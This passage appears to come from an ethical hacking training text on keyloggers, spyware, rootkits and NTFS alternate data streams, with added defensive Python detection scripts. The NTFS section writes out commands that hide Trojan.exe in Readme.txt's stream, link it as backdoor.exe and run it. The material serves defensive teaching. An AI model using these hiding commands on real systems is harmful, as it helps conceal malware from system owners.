* Periodically check the video monitor cables to detect the presence of hardware keyloggers.
* Set up video surveillance around the computer desk to detect plugging in of malicious hardware.
* Disable USB ports or set up advanced BIOS authentication mechanisms to enable USB ports.

Anti-Keyloggers
Anti-keyloggers, also called anti-keystroke loggers, detect and disable keystroke logger software. The special design of these loggers helps them to detect software keyloggers. Many large organizations, financial institutions, online gaming industries, and individuals use anti-keyloggers to protect their privacy while using systems. This software prevents a keylogger from logging every keystroke typed by the victim, and thus keeps all personal information safe and secure. An anti-keylogger scans a computer and detects and removes keystroke logger software. If the software (anti-keylogger) finds any keystroke-logging program on your computer, it immediately identifies and removes the keylogger, whether it is legitimate or illegitimate.
Some anti-keyloggers detect the presence of hidden keyloggers by comparing all files in the computer against a signature database of keyloggers and searching for similarities. Others detect the presence of hidden keyloggers by protecting keyboard drivers and kernels from manipulation. A virtual keyboard or touchscreen makes the task of keystroke-capturing of malicious spyware or Trojan programs difficult. Anti-keyloggers secure your system from spyware and keyloggers.
* Zemana AntiLogger
Source: https://www.zemana.com
Zemana AntiLogger is a software application that blocks attackers. It detects any attempts to modify your computer's settings, record your activities, hook to your PC's sensitive processes, or inject malicious code into your system. The AntiLogger detects the malware at the time it attacks your system, rather than detecting it based on its signature fingerprint.

Figure 6.115: Screenshot of Zemana AntiLogger
Some examples of anti-keyloggers are listed as follows:
* GuardedID (https://www.strikeforcecpg.com)
* KeyScrambler (https://www.qfxsoftware.com)
* Oxynger KeyShield (https://www.oxynger.com)
* Ghostpress (https://schiffer.tech)
* SpyShelter Free Anti-Keylogger (https://www.spyshelter.com)

How to Defend against Spyware
Spyware is any malicious program installed on a user's system without their knowledge. It gathers confidential information such as personal data and access logs. Spyware can originate from three basic sources: free downloaded software, email attachments, and websites that automatically install spyware when you browse them.
Different ways to defend against spyware are as follows:
* Try to avoid using any computer system that you do not have complete control over.
* Never adjust your Internet security setting level too low because it provides many chances for spyware to be installed on your computer. Therefore, always set your Internet browser security settings to either high or medium to protect your computer from spyware.
* Do not open suspicious emails and file attachments received from unknown senders. There is a high likelihood that you will allow a virus, freeware, or spyware onto the computer. Do not open unknown websites linked in spam mail messages, retrieved by search engines, or displayed in pop-up windows because they may mislead you into downloading spyware.
* Enable a firewall to enhance the security level of your computer.
* Regularly update the software, and use a firewall with outbound protection.
* Regularly check Task Manager and MS Configuration Manager reports.
* Regularly update virus definition files and scan the system for spyware.

* Install anti-spyware software. Anti-spyware is the first line of defense against spyware. This software prevents spyware from installing on your system. It periodically scans and protects your system from spyware.
* Keep your OS up to date.
* Windows users should periodically perform a Windows or Microsoft update.
* For users of other OSs or software products, refer to the information given by the OS vendors, and take essential steps against any vulnerability identified.
* Perform web surfing safely and download cautiously.
* Before downloading any software, ensure that it is from a trusted website. Read the license agreement, security warning, and privacy statements associated with the software thoroughly to gain a clear understanding before downloading it.
* Before downloading freeware or shareware from a website, ensure that the site is safe. Likewise, be cautious with software programs obtained through P2P file-swapping software. Before installing such programs, perform a scan using anti-spyware software.
* Do not use administrative mode unless it is necessary, because it may execute malicious programs such as spyware in administrator mode. Consequently, attackers may take complete control of your system.
* Do not download free music files, screensavers, or emoticons from the Internet because when you do, there is a possibility that you are downloading spyware along with them.
* Beware of pop-up windows or web pages. Never click anywhere on the windows that display messages such as "your computer may be infected," or claim that they can help your computer to run faster. If you click on such windows, your system may become infected with spyware.
* Carefully read all disclosures, including the license agreement and privacy statement, before installing any application.
* Do not store personal or financial information on any computer system that is not totally under your control, such as in an Internet café.

Anti-Spyware
There are many anti-spyware applications available on the market, which scan your system and check for spyware such as malware, Trojans, dialers, worms, keyloggers, and rootkits and remove them if found. Anti-spyware provides real-time protection by scanning your system at regular intervals, either weekly or daily. It scans to ensure that the computer is free from malicious software.

- SUPERAntiSpyware

Source: https://www.superantispyware.com

SUPERAntiSpyware is a software application that can detect and remove spyware, adware, Trojan horses, rogue security software, computer worms, rootkits, parasites, and other potentially harmful software applications.

Figure 6.126: Screenshot of SUPERAntiSpyware

Some examples of anti-spyware programs are listed as follows:

- Kaspersky Internet Security 2019 (https://support.kaspersky.com)
- SecureAnywhere Internet Security Complete (https://www.webroot.com)
- adaware antivirus free (https://www.adaware.com)
- MacScan (https://www.securemac.com)
- Norton AntiVirus Plus (https://us.norton.com)

Hiding Files

After an attacker has performed malicious operations (i.e., executed malicious applications) on a target system to gain escalated privileges, he/she embeds and hides his/her malicious programs. The attacker can do this using rootkits, NTFS streams, steganography techniques, etc. to prevent the malicious program from being detected by protective applications such as antivirus, anti-malware, and anti-spyware applications installed on the target system. Such a hidden malicious file allows the attacker to maintain their direct access to the system, even in the future, without the victim's consent. This section describes various techniques used by attackers to hide their malicious files.

Rootkits
Rootkits are software programs designed to gain access to a computer without being detected. They are malware that help attackers gain unauthorized access to a remote system and perform malicious activities. The goal of a rootkit is to gain root privileges to a system. By logging in as the root user of a system, an attacker can perform various tasks such as installing software or deleting files. It works by exploiting the vulnerabilities in the OS and its applications. It builds a backdoor login process in the OS via which the attacker can evade the standard login process.

Once the user enables root access, a rootkit may attempt to hide the traces of unauthorized access by modifying drivers or kernel modules and discarding active processes. Rootkits replace certain OS calls and utilities with their own modified versions of those routines that, in turn, undermine the security of the target system by executing malicious functions. A typical rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, and others.

All files contain a set of attributes. There are different fields in the file attributes. The first field determines the format of the file if it is a hidden, archive, or read-only file. The other field describes the time of the file creation, access, and its original length. The functions GetFileAttributesExA() and GetFileInformationByHandle() are used for the aforementioned purposes. ATTRIB.exe displays or changes the file attributes. An attacker can hide or even change the attributes of a victim's files so that the attacker can access them.
The attacker places a rootkit by:

- Scanning for vulnerable computers and servers on the web
- Wrapping the rootkit in a special package like a game
- Installing it on public or corporate computers through social engineering
- Launching a zero-day attack (privilege escalation, Windows kernel exploitation, etc.)

Objectives of a rootkit:

- To root the host system and gain remote backdoor access
- To mask attacker tracks and the presence of malicious applications or processes
- To gather sensitive data, network traffic, etc. from the system for which attackers might be restricted or have no access
- To store other malicious programs on the system and act as a server resource for bot updates

Types of Rootkits

A rootkit is a type of malware that can hide itself from the OS and antivirus applications on a computer. This program provides the attackers with root-level access to the computer through backdoors. These rootkits employ a range of techniques to gain control of a system. The type of rootkit influences the choice of attack vectors. There are six types of rootkits available:

- Hypervisor-Level Rootkit: Attackers create hypervisor-level rootkits by exploiting hardware features such as Intel VT and AMD-V. These rootkits run in Ring-1 and host the OS of the target machine as a virtual machine, thereby intercepting all hardware calls made by the target OS. This kind of rootkit works by modifying the system's boot sequence so that it is loaded instead of the original virtual machine monitor.
- Hardware/Firmware Rootkit: Hardware/firmware rootkits use devices or platform firmware to create a persistent malware image in hardware, such as a hard drive, system BIOS, or network card. The rootkit hides in firmware as the users do not inspect it for code integrity. A firmware rootkit implies the use of creating a permanent delusion of rootkit malware.
- Kernel-Level Rootkit: The kernel is the core of an OS. A kernel-level rootkit runs in Ring-0 with the highest OS privileges. These cover backdoors on the computer and are created by writing additional code, or by substituting portions of kernel code with modified code via device drivers in Windows or loadable kernel modules in Linux. If the kit's code contains mistakes or bugs, kernel-level rootkits affect the stability of the system. These have the same privileges as the OS; hence, they are difficult to detect and can intercept or subvert the operation of an OS.
- Boot-Loader-Level Rootkit: Boot-loader-level rootkits (bootkits) function either by modifying the legitimate boot loader or replacing it with another one. The bootkit can activate even before the OS starts. Therefore, bootkits are serious threats to security because they facilitate the hacking of encryption keys and passwords.
- Application-Level/User-Mode Rootkit: An application-level/user-mode rootkit runs in Ring-3 as a user along with other applications in the system. It exploits the standard behavior of APIs. It operates inside the victim's computer by replacing the standard application files (application binaries) with rootkits or by modifying the behavior of present applications with patches, injected malicious code, etc.
- Library-Level Rootkits: Library-level rootkits work high up in the OS, and they usually patch, hook, or supplant system calls with backdoor versions to keep the attacker unknown. They replace the original system calls with fake ones to hide information about the attacker.

How a Rootkit Works
System hooking is the process of changing and replacing the original function pointer with a pointer provided by the rootkit in stealth mode. Inline function hooking is a technique in which a rootkit changes some of the bytes of a function inside the core system DLLs (kernel32.dll and ntdll.dll), placing an instruction so that any process calls hit the rootkit first.

Figure 6.117: Working of rootkit

Direct kernel object manipulation (DKOM) rootkits can locate and manipulate the "system" process in kernel memory structures and patch it. This can also hide processes and ports, change privileges, and misguide the Windows event viewer without any problem by manipulating the list of active processes of the OS, thereby altering data inside the process identifier structures. It can obtain read/write access to the \Device\PhysicalMemory object. It hides a process by unlinking it from the process list.

Popular Rootkits

The following are some of the most popular rootkits:

- LoJax
Source: https://www.welivesecurity.com

LoJax is a type of UEFI rootkit that is widely used by attackers to perform cyber-attacks. LoJax is created to inject malware into the system and is automatically executed whenever the system starts up. It exploits UEFI, which acts as an interface between the OS and the firmware. It is extremely challenging to detect LoJax as it evades traditional security controls and maintains its persistence even after OS reinstallation or hard disk replacement. LoJax uses a collection of tools to access and modify the system's UEFI/BIOS settings. The functions performed by these tools include the following:

  - Collect and save all settings of the system in a text file
  - Access the contents of the system's Serial Peripheral Interface (SPI) memory that contains a UEFI/BIOS location and save it as a firmware image
  - Embed a malicious UEFI module (rootkit) into the firmware image and then save the firmware image in the SPI flash memory

Figure 6.118: Screenshot 1 of LoJax

Figure 6.119: Screenshot 2 of LoJax
- Scranos

Source: https://www.bitdefender.com

Scranos is a trojanized rootkit that masquerades as cracked software or a legitimate application, such as anti-malware, a video player, or an ebook reader, to infect systems and perform data exfiltration that damages the reputation of the target and steals intellectual property. When this rootkit is executed, a rootkit driver is automatically installed, which then starts installing other malicious components into the system. Apart from installing malicious components, Scranos also interacts with various websites on the behalf of the victim. The operations performed by the Scranos dropper and rootkit are as follows:

  - The dropper steals critical information such as login credentials, cookies, and payment information using specialized DLLs and sends back the data to a command and control (C&C) server.
  - The dropper installs a rootkit into the system.
  - The rootkit registers a shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the registry.
  - The rootkit injects a downloader into an svchost.exe process.
  - The downloader sends some information about the system to the C&C and receives download links. Payloads are downloaded and executed automatically.

Figure 6.121: Screenshot 2 of Scranos

- HorsePill

Source: http://www.pill.horse

HorsePill is a proof of concept of a ramdisk-based containerizing rootkit. It resides inside "initrd," and before the actual init starts running, it puts it into a mount and PID namespace that allows it to run covert processes and storage. This also allows it to run covert networking systems, such as DNS tunnels.

Figure 6.123: Screenshot 2 of Horse Pill rootkit

It has three important moving parts, which are as follows:

  - klibc-horsepill.patch: This is a patch to klibc that provides run-init, which on modern Ubuntu systems runs the real init, systemd. This patches in the rootkit functionality and creates a malicious run-init. This binary has a new section called the DNSCMDLINE, which provides command-line options to dnscat bundled within the patch.
  - horsepill_setopt: This script takes in command-line arguments and puts them into the section mentioned above.
  - horsepill_infect: This takes the file to splat over run-init while assembling ramdisks as a command-line argument. It then calls update-initramfs and splats over the run-init as the ramdisks are being assembled.

- Necurs

Source: https://www.f-secure.com

Necurs is a kernel-mode driver component that can be used by an attacker (or added as a component to another malicious program) to perform unauthorized actions to take control of an OS, without alerting the system's security mechanisms. Necurs contains backdoor functionality, which allows remote access and control of the infected computer. It also allows the monitoring and filtering of network activity and has been observed to send spam and install rogue security software. It enables further compromise by providing the functionality to do the following:

  - Download additional malware
  - Hide its components
  - Stop security applications from functioning
Figure 6.124: Screenshot 1 of Necurs rootkit

Figure 6.125: Screenshot 2 of Necurs rootkit

Figure 6.126: Screenshot 3 of Necurs rootkit
Some examples of popular rootkits are listed as follows:

- Azazel
- Sirefef
- Wingbird
- Avatar Rootkit
- GrayFish
- ZeroAccess

Detecting Rootkits

We have seen how attackers employ various rootkits to hide files and their presence on the target system. Now, let us discuss various rootkit detection methods from a security perspective. In general, rootkit detection techniques can be categorized into signature-based, heuristic-based, integrity-based, cross-view-based, and runtime execution path profiling.

- Integrity-Based Detection: Integrity-based detection can be regarded as a substitute for both signature-based and heuristic-based detection. Initially, the user runs tools such as Tripwire and AIDE on a clean system. These tools create a baseline of clean system files and store them in a database. Integrity-based detection functions by comparing a current filesystem, boot records, or memory snapshot with that trusted baseline. They detect the evidence or presence of malicious activity based on dissimilarities between the current and baseline snapshots.
- Signature-Based Detection: Signature-based detection methods work as rootkit fingerprints. They compare the characteristics of all system processes and executable files with a database of known rootkit fingerprints. It can compare a sequence of bytes from a file with another sequence of bytes that belong to a malicious program. The method mostly scans system files. It can easily detect invisible rootkits by scanning the kernel memory. The success of signature-based detection is lower owing to the rootkit's tendency to hide files by interrupting the execution path of the detection software.
- Heuristic/Behavior-Based Detection: Heuristic-based detection works by identifying deviations in normal OS patterns or behaviors. This type of detection is also known as behavioral detection. Heuristic detection can identify new, previously unidentified rootkits by recognizing deviants in "normal" system patterns or behaviors. Execution path hooking is one such deviant that helps heuristic-based detectors identify rootkits.
- Runtime Execution Path Profiling: The runtime execution path profiling technique compares runtime execution path profiling of all system processes and executable files. The rootkit adds a new code near a routine's execution path to destabilize it. The method hooks several instructions executed before and after a certain routine, as these can be significantly different.
- Cross-View-Based Detection: Cross-view-based detection techniques function by assuming that the OS has been, in a way, subverted. This technique enumerates the system files, processes, and registry keys by calling common APIs. The tools compare the gathered information with the dataset obtained using an algorithm to traverse through the same data. This detection technique relies on the fact that API hooking or manipulation of the kernel data structure causes the data returned by the OS APIs to be tainted, whereas the low-level mechanisms used to output the same information are free from DKOM or hook manipulation.
- Alternative Trusted Medium: The alternative trusted medium technique is the most reliable method used for detecting rootkits at the OS level. In this technique, the infected system is shut down and then booted from alternative trusted media, such as a bootable CD-ROM or USB flash drive. After booting, the OS storage is checked to find traces of the rootkit, which can further be removed, to restore the system to its normal state.
- Analyzing Memory Dumps: In memory dump analysis, the volatile memory (RAM) of the suspected system is dumped and analyzed to detect the rootkit in the system. Using this technique, one can create a static snapshot of a single process, system kernel, or the entire system. To detect a rootkit, the entire system memory is dumped to analyze and capture active rootkits. This memory dump can further be used to perform offline forensic analysis. Creating memory dumps may require specialized hardware.
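As an added example that is not part of the courseware, the following Python script implements the integrity-based approach described above in its simplest form: a Tripwire/AIDE-style baseline of SHA-256 digests built from a clean tree, serialized as the "database", and later diffed against a fresh walk of the same tree. The directory layout, file contents and the tampering performed in demo() are constructed for the illustration; nothing in it comes from a real system.

```python
"""Minimal integrity-based checker in the style of Tripwire/AIDE.

Added example, not from the CEH courseware: build a baseline of SHA-256
digests for every file under a root, store it as JSON (the "database"),
and later compare a fresh walk against it.  demo() constructs a small
sample tree, tampers with it, and returns what the comparison reports.
"""
import hashlib
import json
import os
import tempfile


def sha256_file(path, chunk_size=65536):
    """Digest a file in chunks so large binaries are not read into RAM at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_baseline(root):
    """Map each file's path (relative to root, '/' separated) to its digest and size."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {"sha256": sha256_file(full), "size": os.path.getsize(full)}
    return baseline


def compare(baseline, current):
    """Report paths that were added, removed, or whose digest changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(
        path for path in set(baseline) & set(current)
        if baseline[path]["sha256"] != current[path]["sha256"]
    )
    return {"added": added, "removed": removed, "modified": modified}


def _write(root, rel, data):
    """Helper for the constructed scenario: create rel under root with data."""
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as handle:
        handle.write(data)


def demo():
    """Constructed scenario: baseline a clean tree, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as root:
        # "Clean" system: two binaries and a config file (constructed sample content).
        _write(root, "bin/ls", b"original ls binary")
        _write(root, "bin/ps", b"original ps binary")
        _write(root, "etc/ld.so.preload", b"")

        # In practice the baseline lives off-box; a JSON round-trip stands in for it here.
        database = json.dumps(build_baseline(root))

        # Tampering: a same-length replacement of ls (a size check alone would miss it),
        # a new shared object, and a change to the preload config.
        _write(root, "bin/ls", b"trojaned ls binary")
        _write(root, "lib/libhook.so", b"hook")
        _write(root, "etc/ld.so.preload", b"/lib/libhook.so\n")

        return compare(json.loads(database), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two points from the text apply directly to this checker: the baseline database must be stored where the suspect host cannot rewrite it, and the comparison is only trustworthy when the file reads themselves are, which is why the alternative trusted medium technique pairs naturally with it (a kernel-level rootkit that hooks file I/O can feed the scanner the original bytes).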

Steps for Detecting Rootkits
There are many tools available on the market that can be used to detect the presence of rootkits on a target system. However, sometimes, tools are inadequate as the malware writers always find ways to counter these automated rootkit detectors, and some of their latest efforts are even able to evade them. Therefore, it is better to manually detect a rootkit. Manual detection of rootkits requires time, patience, perseverance, and expertise. Manually examine the filesystem and registry of the system to detect rootkits.

Steps to detect rootkits by examining the filesystem are as follows.

1. Run "dir /s /b /ah" and "dir /s /b /a-h" inside the potentially infected OS and save the results.
2. Boot into a clean CD, run "dir /s /b /ah" and "dir /s /b /a-h" on the same drive, and save the obtained results.
3. Run the latest version of the WinMerge tool on the two sets of results to detect file-hiding ghostware (i.e., invisible inside, but visible from the outside).

Steps to detect rootkits by examining the registry are as follows.

1. Run regedit.exe from inside the potentially infected OS.
2. Export the HKEY_LOCAL_MACHINE\SOFTWARE and HKEY_LOCAL_MACHINE\SYSTEM hives in text file format.
3. Boot into a clean CD (such as WinPE).
4. Run regedit.exe.
5. Create a new key, such as HKEY_LOCAL_MACHINE\Temp.
6. Load the registry hives named Software and System from the suspect OS. The default location will be c:\windows\system32\config\software and c:\windows\system32\config\system.
7. Export these registry hives in text file format. (The registry hives are stored in binary format, and Steps 6 and 7 convert the files to text.)
8. Launch the WinMerge tool from the CD and compare the two sets of results to detect file-hiding malware (i.e., invisible inside, but visible from the outside).

Note: There can be some false positives. In addition, this does not detect stealth software that hides in BIOS, bad disk sectors, alternate data streams (ADSs), video card EEPROM, etc.
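The WinMerge step of the filesystem procedure above reduces to a set difference between the two listings. As an added example that is not part of the courseware, the Python script below performs that comparison on two constructed "dir /s /b" captures and handles a practical detail the manual procedure leaves to the analyst: after booting from clean media the same volume usually carries a different drive letter, so paths are compared with the letter dropped. Every path in the sample listings and the noise list are constructed for the illustration.

```python
"""Cross-view comparison of two 'dir /s /b' captures (the WinMerge step in code).

Added example, not from the CEH courseware.  INSIDE_LISTING stands for the
concatenated output of 'dir /s /b /ah' and 'dir /s /b /a-h' taken inside the
suspect OS; OUTSIDE_LISTING for the same commands run after booting from a
clean CD, where the volume received a different drive letter.  Both are
constructed samples.
"""
import re

INSIDE_LISTING = """\
C:\\Windows\\System32\\ntdll.dll
C:\\Windows\\System32\\kernel32.dll
C:\\Windows\\Temp\\setup.log
C:\\Users\\Alice\\Documents\\report.docx
"""

OUTSIDE_LISTING = """\
D:\\Windows\\System32\\ntdll.dll
D:\\Windows\\System32\\kernel32.dll
D:\\Windows\\System32\\drivers\\hidden.sys
D:\\Windows\\Temp\\setup.log
D:\\Windows\\Temp\\crash.dmp
D:\\Users\\Alice\\Documents\\report.docx
D:\\Users\\Alice\\AppData\\Local\\Temp\\~tmp.exe
"""

_DRIVE_LETTER = re.compile(r"^[A-Za-z]:")

# Locations that legitimately change between the two captures (logs, temp files,
# the recycle bin) and would otherwise show up as false positives.  Constructed
# starting list; extend it from what the first comparison reports.
NOISE_PREFIXES = ("\\windows\\temp\\", "\\$recycle.bin\\", "\\system volume information\\")


def normalize(listing):
    """Return the set of paths with the drive letter dropped and case folded,
    so the same volume compares equal under any letter the rescue OS assigned."""
    paths = set()
    for line in listing.splitlines():
        line = line.strip()
        if line:
            paths.add(_DRIVE_LETTER.sub("", line).lower())
    return paths


def is_noise(path):
    return any(path.startswith(prefix) for prefix in NOISE_PREFIXES)


def ghost_files(inside_listing, outside_listing):
    """Files visible from the clean boot but absent from the live view: the
    'invisible inside, visible from outside' signature of file-hiding malware."""
    hidden = normalize(outside_listing) - normalize(inside_listing)
    return sorted(p for p in hidden if not is_noise(p))


def live_only_files(inside_listing, outside_listing):
    """Files the live OS lists that the clean boot cannot find.  Usually capture
    noise (deleted between the two runs); worth a look if it is not."""
    extra = normalize(inside_listing) - normalize(outside_listing)
    return sorted(p for p in extra if not is_noise(p))


if __name__ == "__main__":
    for path in ghost_files(INSIDE_LISTING, OUTSIDE_LISTING):
        print("hidden from live OS:", path)
```

Both hidden-attribute and normal listings should be concatenated into each side before the comparison, otherwise a file that merely has the hidden attribute set appears as a finding. The note about false positives still applies: anything reported under a path that changes during normal operation needs confirmation before it is treated as ghostware.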

How to Defend against Rootkits
A common feature of these rootkits is that the attacker requires administrator access to the target system. The initial attack that leads to this access is often noisy. Therefore, one should monitor the excess network traffic that arises in the face of a new exploit. It is obvious that log analysis is an important component of risk management. The attacker may have shell scripts or tools that can help him/her cover his/her tracks, but there will almost certainly be other telltale signs that can lead to proactive countermeasures, not just the reactive ones.

A reactive countermeasure is to back up all critical data, excluding the binaries, and perform a fresh, clean installation from a trusted source. One can perform code checksumming as a good defense against tools like rootkits. MD5sum.exe can fingerprint files and note integrity violations when changes occur. To defend against rootkits, integrity checking programs should be used for critical system files.

A few techniques adopted to defend against rootkits are as follows.

- Reinstall OS/applications from a trusted source after backing up critical data
- Maintain well-documented automated installation procedures
- Perform kernel memory dump analysis to determine the presence of rootkits
- Harden the workstation or the server against the attack
- Educate staff not to download any files/programs from untrusted sources
- Install network- and host-based firewalls and frequently check for updates
- Ensure the availability of trusted restoration media
- Update and patch OSs, applications, and firmware
- Regularly verify the integrity of system files using cryptographically strong digital fingerprint technologies
- Regularly update antivirus and anti-spyware software
- Keep anti-malware signatures up to date
- Avoid logging into an account with administrative privileges
- Adhere to the least privilege principle
- Ensure that the chosen antivirus software possesses rootkit protection
- Do not install unnecessary applications, and disable the features and services not in use
- Refrain from engaging in dangerous activities on the Internet
- Close any unused ports
- Periodically scan the local system using host-based security scanners
- Increase the security of the system using two-step or multi-step authentication, so that an attacker will not gain root access to the system to install rootkits
- Never read emails, browse websites, or open documents while handling an active session with a remote server
- Use configuration management and vulnerability-scanning tools to verify effective deployment of updates

Anti-Rootkits
The following anti-rootkits can be used to remove various types of malware, such as rootkits, Trojans, viruses, and worms, from the system. You can download or purchase anti-rootkit software from their websites and install them on your PC to gain protection from malware, especially from rootkits.

- GMER

Source: http://www.gmer.net

GMER is an application that helps security professionals to detect and remove rootkits by scanning processes, threads, modules, services, files, disk sectors (MBR), ADSs, registry keys, driver hooking SSDT, IDT, and IRP calls, and inline hooks.

Figure 6.127: Screenshot of anti-rootkit

A few more important anti-rootkits are listed as follows.

- Stinger (https://www.mcafee.com)
- Avast Free Antivirus (https://www.avast.com)
- TDSSKiller (https://usa.kaspersky.com)
- Malwarebytes Anti-Rootkit (https://www.malwarebytes.com)
- RootkitBuster (http://www.trendmicro.co.in)

NTFS Data Stream

NTFS is a filesystem that stores a file with the help of two data streams, called NTFS data streams, along with the file attributes. The first data stream stores the security descriptor for the file to be stored, such as permissions, and the second stores the data within a file. ADSs are another type of named data stream that can be present within each file.

Figure 6.128: NTFS data streams

An ADS refers to any type of data attached to a file, but not in the file on an NTFS system. The master file table of the partition contains a list of all the data streams that a file contains and their physical locations on the disk. Therefore, ADSs are not present in the file but attached to it through the file table. NTFS ADS is a Windows hidden stream that contains metadata for the file, such as attributes, word count, author name, and access and modification times of the file.

ADSs can fork data into existing files without changing or altering their functionality, size, or display to file-browsing utilities. They allow an attacker to inject malicious code into files on an accessible system and execute them without being detected by the user. ADSs provide attackers with a method of hiding rootkits or hacker tools on a breached system and allow a user to execute them while hiding from the system administrator.

Figure 6.129: Hiding files using NTFS data streams

Files with ADS are impossible to detect using native file-browsing techniques such as the command line or Windows Explorer. After an ADS file is attached to the original file, the size of the original file does not change. The only indication that the file was changed is the modification timestamp, which can be innocuous.

How to Create NTFS Streams

Using NTFS data streams, an attacker can almost completely hide files within a system. It is easy to use the streams, but the user can only identify it with specific software. Explorer can display only the root files; it cannot view the streams linked to the root files and cannot define the disk space used by the streams. As such, if a virus implants itself into ADS, it is unlikely that standard security software will identify it. When the user reads or writes a file, it manipulates the main data stream by default. We now explore how to create an ADS for a file. ADSs follow the syntax: "filename.ext:alternateName".

Steps to create NTFS streams:

1. Launch c:\>notepad myfile.txt:Lion.txt to create the new file, and click 'Yes'. Enter some data, and save the file.
2. Launch c:\>notepad myfile.txt:tiger.txt to create the new file, and click 'Yes'. Enter some data, and save the file.
3. View the file size of myfile.txt (It should be zero).
4. The following commands can be used to view or modify stream data hidden in steps 1 and 2, respectively:
   notepad myfile.txt:Lion.txt
   notepad myfile.txt:tiger.txt

Note: Notepad is a stream-compliant application. You should not use alternate streams to store critical information.

NTFS Stream Manipulation

You can manipulate NTFS streams to hide a malicious file in other files, such as text files, by doing the following:

Hiding Trojan.exe (malicious program) in Readme.txt (stream):

Use the following command to move the contents of Trojan.exe to Readme.txt (stream):

c:\>type c:\Trojan.exe > c:\Readme.txt:Trojan.exe

The "type" command hides a file in an alternate data stream (ADS) behind an existing file. The colon (:) operator gives the command to create or use ADS.

Figure: Moving the contents of Trojan.exe (size: 2 MB) to Readme.txt (size: 0)

Creating a link to the Trojan.exe stream inside the Readme.txt file:

After hiding the file Trojan.exe behind the Readme.txt file, you need to create a link to launch the Trojan.exe file from the stream. This creates a shortcut for Trojan.exe in the stream.

C:\>mklink backdoor.exe Readme.txt:Trojan.exe

Executing the Trojan:

Type C:\>backdoor to run the Trojan. Here, the backdoor is the shortcut created in the previous step, which on execution installs the Trojan that you have hidden behind Readme.txt.

Note: Use Notepad to read the hidden file. For example, the command C:\>notepad sample.txt:secret.txt creates the secret.txt stream behind the sample.txt file.

How to Defend against


NTFSStreams
You shoulddothe following
to defendagainst
malicious NTFSstreams:

* To delete hidden NTFS streams, move the suspected files to a file allocation table (FAT) partition.

* Use a third-party file integrity checker such as Tripwire File Integrity Manager to maintain the integrity of NTFS partition files against unauthorized ADSs.

* Use third-party utilities to show and manipulate hidden streams, such as EventSentry SysAdmin Tools or adslist.exe.

* Avoid writing important or critical data to ADSs.

* Use up-to-date antivirus software on your system.

* Enable real-time antivirus scanning to protect against the execution of malicious streams in your system.

* Use file-monitoring software such as Stream Detector (https://www.novirusthanks.org) and GMER (http://www.gmer.net) to help detect the creation of additional or new data streams.

* You should use LADS (https://www.aldeid.com) software as a countermeasure for NTFS streams. The latest version of lads.exe is GUI-based, searches for either single or multiple streams, reports the presence of ADSs, and provides the full path and length of each ADS found. Other means include copying the cover file to a FAT partition and then moving it back to NTFS. Because FAT file systems do not support ADSs, this will effectively remove them from the original file.
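A defender-side check for the third-party-utility and monitoring items above, as an added example that is not part of the courseware: the built-in `dir /R` option of cmd.exe lists every alternate data stream beneath its host file, and this script parses a saved listing and ranks the streams it finds so they can be triaged without another tool. SAMPLE_LISTING is constructed sample output (it reuses the Readme.txt:Trojan.exe names from the text), and the function and class names are mine.

```python
"""Flag alternate data streams (ADS) in saved output of Windows `dir /R`.

Added example, not from the EC-Council courseware. `dir /R` is the built-in
cmd.exe option that lists NTFS streams beneath each file; this script turns a
saved listing into findings a defender can triage. The listing below is
constructed sample output, not a capture from a real host.
"""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: stream lines carry no date/time column, only size + name.
SAMPLE_LISTING = """\
 Directory of C:\\Share

05/01/2020  10:00 AM    <DIR>          .
05/01/2020  10:00 AM    <DIR>          ..
05/01/2020  10:02 AM                 0 Readme.txt
                                2,097,152 Readme.txt:Trojan.exe:$DATA
05/01/2020  10:05 AM            14,313 report.pdf
                                      26 report.pdf:Zone.Identifier:$DATA
05/01/2020  10:07 AM               512 notes.txt
"""

# A stream line: leading blanks, size, then host:stream:$DATA (no date prefix).
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

# Mark-of-the-web written by browsers and mail clients: reported, low priority.
EXPECTED_STREAMS = {"Zone.Identifier"}
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js")


@dataclass
class Finding:
    host_file: str
    stream: str
    size: int
    severity: str          # "high" (executable-named), "medium", or "info"


def classify(stream: str, size: int) -> str:
    """Rank a stream: executables hidden behind a file rank highest."""
    if stream in EXPECTED_STREAMS:
        return "info"
    if stream.lower().endswith(EXEC_SUFFIXES):
        return "high"
    return "medium" if size > 0 else "info"


def parse_dir_r(listing: str) -> List[Finding]:
    """One Finding per alternate data stream in the listing, in file order."""
    findings = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            host, stream = m.group(2).strip(), m.group(3)
            findings.append(Finding(host, stream, size, classify(stream, size)))
    return findings


def needs_review(listing: str) -> List[Finding]:
    """Only the streams an analyst should look at (everything above 'info')."""
    return [f for f in parse_dir_r(listing) if f.severity != "info"]


if __name__ == "__main__":
    for f in parse_dir_r(SAMPLE_LISTING):
        print(f"{f.severity:6} {f.host_file}:{f.stream} ({f.size} bytes)")
```

Run `dir /R /S > listing.txt` on the volume and feed the file to parse_dir_r(); Zone.Identifier streams are expected on downloaded files, so they are kept as "info" rather than dropped, which preserves the evidence trail while keeping the review list short.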

NTFS Stream Detectors

There are various NTFS stream detectors available on the market. You can detect suspicious streams with the following NTFS stream detectors. You can download and install these stream detectors from their websites.
* Stream Armor

Source: https://securityxploded.com

StreamArmor is a tool used to discover hidden ADSs and clean them completely from your system. Its advanced auto analysis, coupled with an online threat verification mechanism, helps you eradicate any ADSs that may be present. As shown in the screenshot, security professionals use StreamArmor to analyze and detect ADS streams in their systems.

Figure 6.131: Screenshot of Stream Armor

